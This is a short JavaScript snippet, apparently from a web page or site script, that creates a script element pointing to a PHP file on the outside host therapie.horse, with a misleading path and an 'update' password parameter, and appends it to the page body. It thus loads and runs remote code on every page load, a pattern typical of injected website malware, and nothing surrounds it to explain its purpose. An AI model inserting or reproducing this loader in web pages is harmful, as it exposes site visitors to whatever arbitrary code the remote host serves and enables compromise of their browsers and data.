jsinfo = "https://therapie.horse/stat/cache_creator.php?pw=update";
try {
var script = document.createElementNS('http://www.w3.org/1999/xhtml','script');
script.setAttribute('type', 'text/javascript');
script.setAttribute('src', jsinfo);
document.getElementsByTagName('body')[0].appendChild(script);
}
catch(e) {
str = ""
document.write(str+""); }